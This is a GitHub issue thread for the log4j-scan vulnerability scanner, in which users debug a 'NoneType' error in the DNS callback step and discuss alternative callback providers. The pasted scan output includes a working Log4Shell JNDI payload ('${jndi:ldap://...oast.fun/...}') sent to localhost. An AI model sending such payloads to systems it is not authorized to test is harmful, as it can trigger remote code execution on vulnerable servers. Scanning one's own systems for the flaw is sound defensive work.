search

fullhunt / log4j-scan

A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
MIT License
3.4k stars 739 forks source link

TypeError: 'NoneType' object is not iterable #136

Open dhruvvyas25 opened 1 year ago

dhruvvyas25 commented 1 year ago

[•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). [%] Checking for Log4j RCE CVE-2021-44228. [•] URL: http://localhost:8080 [•] URL: http://localhost:8080 | PAYLOAD: ${jndi:ldap://localhost.p97134d965e040448l83fr08g8280o09p.oast.fun/yducxqq} [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks. [•] Waiting... Traceback (most recent call last): File "/root/log4j-scan/log4j-scan.py", line 437, in main() File "/root/log4j-scan/log4j-scan.py", line 426, in main records = dns_callback.pull_logs() ^^^^^^^^^^^^^^^^^^^^^^^^ File "/root/log4j-scan/log4j-scan.py", line 278, in pull_logs for i in data_list: TypeError: 'NoneType' object is not iterable

andre-m-faria commented 1 year ago

I'm with the same problem

jjc224 commented 11 months ago

Same here. Possible workaround in the meantime is to use --dns-callback-provider dnslog.cn.

baiwei0703 commented 4 months ago

Same here. Possible workaround in the meantime is to use --dns-callback-provider dnslog.cn.

dnslog.cn seems could not reachable ...

add this option get another problem

Traceback (most recent call last): File "/app/log4j-scan.py", line 437, in <module> main() File "/app/log4j-scan.py", line 409, in main dns_callback = Dnslog() File "/app/log4j-scan.py", line 224, in __init__ req = self.s.get("http://www.dnslog.cn/getdomain.php", File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 602, in get return self.request("GET", url, **kwargs) File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 589, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 703, in send r = adapter.send(request, **kwargs) File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 519, in send raise ConnectionError(e, request=request) requests.exceptions.ConnectionError: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by NameResolutionError("<urllib3.connection.HTTPConnection object at 0x7f39f6e1a2c0>: Failed to resolve 'www.dnslog.cn' ([Errno -3] Try again)"))